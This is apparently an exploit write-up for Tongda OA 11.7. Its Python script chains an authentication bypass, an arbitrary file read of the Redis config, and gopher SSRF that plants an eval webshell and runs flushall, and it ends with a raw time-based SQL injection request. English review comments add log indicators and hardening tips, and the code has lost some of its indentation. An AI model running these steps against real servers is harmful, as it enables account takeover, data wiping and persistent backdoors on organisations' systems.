
通达OA11.7 利用/zh-hant


漏洞利用

通达OA 任意用户登录:利用条件是管理员当前在线。

http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

访问上述路径后,服务端会覆盖当前 session,可直接使用返回的 cookie 登录;再访问 /general/ 目录即可进入后台。

如果响应什么都没有返回,就直接使用当前的 PHPSESSID 继续访问。

获取安装目录,用于读取 redis 配置文件:

/general/approve_center/archive/getTableStruc.php

任意文件读取:

/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2

由此读取到 redis 密码,然后通过 SSRF(gopher 协议,目标为本机 6399 端口的 redis):

/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/

EXP

# -*- coding:utf-8 -*-
import os
import requests
import re
# author :print("")
import urllib




# NOTE(review): this listing lost its indentation and some punctuation when the
# page was extracted, so it does not parse as shown; the comments describe what
# the visible statements do, for log review and triage.
#
# GenerateUrl renders a fixed Redis command script as a percent-encoded string.
# Commands in the template, in order: AUTH, flushall, CONFIG SET dbfilename,
# CONFIG SET dir, SET, save, quit.
# Triage impact: flushall empties the Redis keyspace, and CONFIG SET followed by
# save makes Redis write its dump file under the supplied directory and file
# name (the caller on this page supplies <install>/webroot/ and 666.php).
# Hardening: Redis's rename-command directive can disable CONFIG, and the Redis
# service account should not be able to write into the web root.
class GenerateUrl:
    def __init__(self, password, webroot, filename):
        self.password = password
self.webroot = webroot
self.filename = filename
# Value stored under Redis key "1" by the SET command in the template: PHP that
# calls file_put_contents() to create 11.php from a base64-encoded blob.
# 11.php is therefore a second file name to look for during cleanup.
self.webshell = '''
        
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>


'''
        # Redis protocol text with {placeholders}; the ${..._len} fields are the
        # length prefixes. The leading "_" is presumably the gopher item-type
        # character that the fetching client drops - TODO confirm.
        self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
{filename}
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit


'''
    # Fills the placeholders and returns the encoded command script.
    # self.template is overwritten in place, so the placeholders are gone after
    # the first call.
    def __str__(self):
        webshell = self.webshell
# Manual percent-encoding of the PHP snippet (quotes, comma, space, newline,
# "<", "?", ">").
webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
'>', '%3e')
self.template = self.template.replace("{password_len}", str(len(self.password)))
self.template = self.template.replace("{password}", self.password)
self.template = self.template.replace("{filename_len}", str(len(self.filename)))
self.template = self.template.replace("{filename}", self.filename)
self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
self.template = self.template.replace("{webroot}", self.webroot)
# content_len is taken from the raw snippet, not from the encoded copy.
self.template = self.template.replace("{content_len}", str(len(self.webshell)))
self.template = self.template.replace("{content}", webshell)
# Newlines become %0D%0A and quote_plus then encodes the whole string again, so
# each "%" is emitted as %25. In web access logs the ATTACHMENTS value should
# therefore show doubly encoded CR/LF sequences, which is a usable search term.
self.template = self.template.replace('\n', '%0D%0A')
return urllib.quote_plus(self.template)


# Routes get_path() and ssrf_webshell() traffic through a local intercepting
# proxy on 127.0.0.1:8080 (used for both http and https). get_cookie() and the
# final request for 666.php do not pass proxies=.
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
# Returns the request headers used by the later stages: a fixed legacy
# User-Agent string (note the trailing space) and the caller's value as Cookie.
# The fixed User-Agent is a weak but cheap indicator when searching web logs.
def headers(phpsesion):
    return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
"Cookie": phpsesion
}



# Get the absolute install directory.
# Second stage, sent with the session headers: two GET requests, returning a
# dict with "path" and "redis_pass".
# Log indicators: a request to getTableStruc.php followed by a photo.php request
# whose AVATAR_FILE is an absolute path outside the avatar store.
# After an incident, treat the Redis password as disclosed and rotate it.
def get_path(url, headers):
    urlc = url
url = (url + '/general/approve_center/archive/getTableStruc.php')
try:
        data = requests.get(url=url, headers=headers, proxies=proxies).json()
# Takes the logPath field of the JSON response and keeps the part before the
# first backslash (the subscripts on this line were lost in extraction);
# presumably that is the install root - TODO confirm against a real response.
path = data'logPath'.split('\\')0
# Asks photo.php to return <path>/bin/redis.windows.conf through AVATAR_FILE.
url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
data2 = requests.get(url=url2, headers=headers, proxies=proxies)
# Pulls the "requirepass ..." line out of the returned config text.
ress = re.search('requirepass .+', data2.text).group()
return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
# Bare except: every failure (bad JSON, missing field, no regex match) is
# reported with the same "expired" message, so the message is not diagnostic.
except:
        exit('ERROR Cookie PHPSESSID expired')




# Write a file via SSRF.
# Third stage: builds the Redis command script with dir=<path>/webroot/ and
# dbfilename=666.php, appends it to gopher://127.0.0.1:6399/ and passes the
# result as ATTACHMENTS to img_download.php; the server-side fetch is what
# reaches the local Redis.
# Detection: img_download.php requests whose ATTACHMENTS value starts with a
# scheme other than http(s), and a new 666.php (or 11.php) under webroot.
# Mitigation: restrict that fetcher to the expected schemes and hosts, and apply
# a vendor-fixed release if one is available.
def ssrf_webshell(url, path, password):
    urlc = url
path = path
password = password
a = GenerateUrl(password, path + "/webroot/", "666.php")
url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
# `headers` is not a parameter here; it is the module-level name, which the
# __main__ block rebinds to the header dict before this call.
data = requests.get(url=url, headers=headers, proxies=proxies)
# Checks the result by requesting /666.php with no cookies and no proxy;
# HTTP 200 is treated as success.
ddd = requests.get(url=urlc + '/666.php')
if ddd.status_code == 200:
        print('shell url:%s' % urlc + '/666.php')
else:
        print('send shell ERROR')
# Returns True whether or not the check above succeeded.
return True


# First stage, sent without any session: GET
# /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 with a Chrome 86 User-Agent
# (different from the User-Agent used by the later stages).
# Detection: requests to auth_mobi.php carrying isAvatar=1 and a uid parameter
# that are answered with HTTP 200, an empty body and a session cookie.
def get_cookie(url):
    url =  url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
        response = requests.get(url=url, headers=headers)
# HTTP 200 with "RELOGIN" in the body: the script exits, reporting that the
# target user is offline.
if "RELOGIN" in response.text and response.status_code == 200:
            exit("目标用户为离线状态")
# HTTP 200 with an empty body: the SESSIONID cookie set by the response is
# returned to the caller.
elif response.status_code == 200 and response.text == "":
            print("好了马上就能getshell了")
cookies = response.cookies
cookie = requests.utils.dict_from_cookiejar(cookies)
if   cookie'SESSIONID':
                return cookie'SESSIONID'
else:
                exit('实在抱歉,getshell不了')
# Any other response: prints a message and falls through, so the function
# returns None.
else:
            print("未知错误,目标可能不存在或不存在该漏洞")
except Exception as e:
        exit('实在抱歉,getshell不了')


# Entry point: takes the base URL from the command line and runs the three
# stages in order (get_cookie, get_path, ssrf_webshell).
# In web logs this appears as one client requesting auth_mobi.php,
# getTableStruc.php, photo.php, img_download.php and /666.php in quick
# succession.
if __name__ == '__main__':
    import sys
try:
        url = sys.argv1
cookie =get_cookie(url)
# Rebinds the module-level name `headers` from the function to the dict it
# returns; ssrf_webshell() reads that name.
headers = headers(cookie)
root_path = get_path(url, headers)
ssrf_webshell(url, root_path'path', root_path'redis_pass')
# Bare except: any exception ends in the usage line.
except:
        print('python tongda.py http://127.0.0.1')

SQL

POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
Host:
10.211.55.5
Content-Length: 39
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
i/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin:
http://10.211.55.5
Referer:
http://10.211.55.5/general/officeProduct/product_apply/index.php
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
; SID_1=24205621
Connection: close
arr5pro_id=151';select sleep(3) %23
